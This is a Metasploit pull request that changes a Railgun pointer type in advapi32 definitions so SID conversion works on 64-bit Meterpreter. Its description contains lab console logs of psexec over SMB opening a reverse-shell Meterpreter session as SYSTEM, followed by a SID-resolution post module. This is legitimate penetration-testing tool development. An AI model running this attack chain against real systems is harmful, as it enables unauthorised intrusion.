### PR TITLE
Update pointer type to support 64 bit calls

### DIFF
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_advapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_advapi32.rb
@@ -1263,12 +1263,13 @@ class Def_windows_advapi32
 
     dll.add_function('ConvertStringSidToSidA', 'BOOL',[
       ["PCHAR","StringSid","in"],
-      ["PDWORD","pSid","out"],
+      ["PLPVOID","pSid","out"],
       ])
 
     dll.add_function('ConvertStringSidToSidW', 'BOOL',[
       ["PWCHAR","StringSid","in"],
-      ["PDWORD","pSid","out"],
+      ["PLPVOID","pSid","out"],
+      ["PLPVOID","pSid","out"],
       ])
 
     dll.add_function('CopySid', 'BOOL',[

--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_advapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_advapi32.rb
@@ -1269,7 +1269,6 @@ class Def_windows_advapi32
     dll.add_function('ConvertStringSidToSidW', 'BOOL',[
       ["PWCHAR","StringSid","in"],
       ["PLPVOID","pSid","out"],
-      ["PLPVOID","pSid","out"],
       ])
 
     dll.add_function('CopySid', 'BOOL',[


### PR DESCRIPTION
While testing https://github.com/rapid7/metasploit-framework/pull/17921 I found that the post module failed when using a 64-bit meterpreter.  This was because we were using the incorrect pointer type.

Before:
```
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'msfuser'...
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Executing the payload...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 10.5.134.159
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.159:64656) at 2023-04-24 17:16:06 -0500

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsid
Server SID: S-1-5-18
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set ssession 1
[-] Unknown datastore option: ssession. Did you mean SESSION?
msf6 post(windows/gather/resolve_sid) > set session 1
session => 1
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-18
sid => S-1-5-18
msf6 post(windows/gather/resolve_sid) > run
[*] 10.5.134.159 - Meterpreter session 1 closed.  Reason: Died

```

After
```
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'msfuser'...
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Executing the payload...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 10.5.134.159
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.159:64647) at 2023-04-24 17:11:43 -0500

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsid
Server SID: S-1-5-18
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/psexec) > use post/windows/gather/resolve_sid
msf6 post(windows/gather/resolve_sid) > set session 2
session => 2
msf6 post(windows/gather/resolve_sid) > set sid S-1-5-18
sid => S-1-5-18
msf6 post(windows/gather/resolve_sid) > run

[*] SID Type: user
[*] Name:     SYSTEM
[*] Domain:   NT AUTHORITY
[*] Post module execution completed
msf6 post(windows/gather/resolve_sid) > 

```